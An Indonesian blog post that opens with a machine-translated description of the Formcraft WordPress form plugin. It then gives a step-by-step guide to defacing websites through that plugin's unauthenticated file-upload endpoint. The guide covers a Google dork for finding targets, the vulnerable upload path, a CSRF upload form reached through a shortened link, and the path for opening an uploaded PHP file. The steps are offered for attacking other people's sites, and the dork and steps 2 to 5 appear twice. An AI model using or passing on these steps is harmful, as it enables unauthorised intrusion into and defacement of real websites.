Formcraft adalah bentuk drag-and-drop pembangun untuk membuat dan bentuk embed, dan melacak kiriman. bentuk WYSIWYG builder kami cepat, mudah digunakan dan menawarkan kustomisasi yang luas.
Buat Keren Bentuk
Bentuk tidak perlu terlihat jelek lagi. Kami telah menghabiskan banyak waktu pada platform pembangun formulir kami untuk memastikan semua bentuk yang dibuat dengan pembangun bentuk Formcraft adalah sebagai gaya dan indah sebagai website Anda. Semua bentuk kami responsif di semua perangkat, secara default. Formcraft form builder adalah alternatif yang bagus untuk pembangun bentuk lain seperti Contact Form 7
Contoh
Formcraft dapat digunakan untuk membuat berbagai bentuk, seperti formulir kontak, bentuk dukungan, formulir aplikasi, dll ...
4th Gen Form Building Landasan
Formcraft didasarkan pada platform bentuk Gen bangunan kami 4, yang merupakan re-write atas platform 3rd Gen. Hal ini cepat, ringan, dan membuat bentuk cantik.
Fitur
- form builder drag-and-drop
- bentuk responsif
- Dukungan untuk 8 bidang jenis, termasuk HTML
- bentuk menanamkan menggunakan shortcode di situs Anda
- Dapatkan pemberitahuan email langsung di formulir pengajuan
- Ekspor bentuk / Impor template
- Ringan dan cepat
- Validasi form - front-end dan back-end
Terjemahan-siap Dukungan & FeedBack
Jika Anda suka Formcraft bentuk builder, tolong beri kami rating! Jika Anda memiliki masalah dukungan, atau butuh bantuan dengan pembangun bentuk, Anda dapat menggunakan forum. Kami terus berusaha untuk meningkatkan platform yang bentuk builder kami, dan umpan balik Anda yang paling berharga.
Selebihnya lihat di https://wordpress.org/plugins/formcraft-form-builder/
Baiklah, kita mulai saja cara deface metode Formcraft File Upload
1. Cari target menggunakan dork dibawah. Silahkan kembangkan sendiri.
inurl:/wp-content/plugins/formcraft/
2. Buka target, lalu tambahkan exploitnya setelah kata "/formcraft/” (tanpa tanda petik). Jika target tersebut vuln maka tampilanya kurang lebih seperti ini.
http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/index.php
3. Buka CSRF (saya menggunakan CSRF online buatan saya) http://sh.st/YiF8, masukan datanya seperti pada gambar.
4. Jika file berhasil terunggah maka tampilanya seperti gambar.
5. Buka file kalian yang telah terunggah di http://[site]/[path]/[exploit]/files/[filekalian].php
http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/files/[filekalian].php
sumber : http://azisalvriyanto.blogspot.co.id/2016/03/cara-deface-website-metode-formcraft.html#
inurl:/wp-content/plugins/formcraft/
2. Buka target, lalu tambahkan exploitnya setelah kata "/formcraft/” (tanpa tanda petik). Jika target tersebut vuln maka tampilanya kurang lebih seperti ini.
http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/index.php
3. Buka CSRF (saya menggunakan CSRF online buatan saya) http://sh.st/YiF8, masukan datanya seperti pada gambar.
4. Jika file berhasil terunggah maka tampilanya seperti gambar.
5. Buka file kalian yang telah terunggah di http://[site]/[path]/[exploit]/files/[filekalian].php
http://[site]/[path]/wp-content/plugins/formcraft/file-upload/server/php/files/[filekalian].php
0 komentar:
Posting Komentar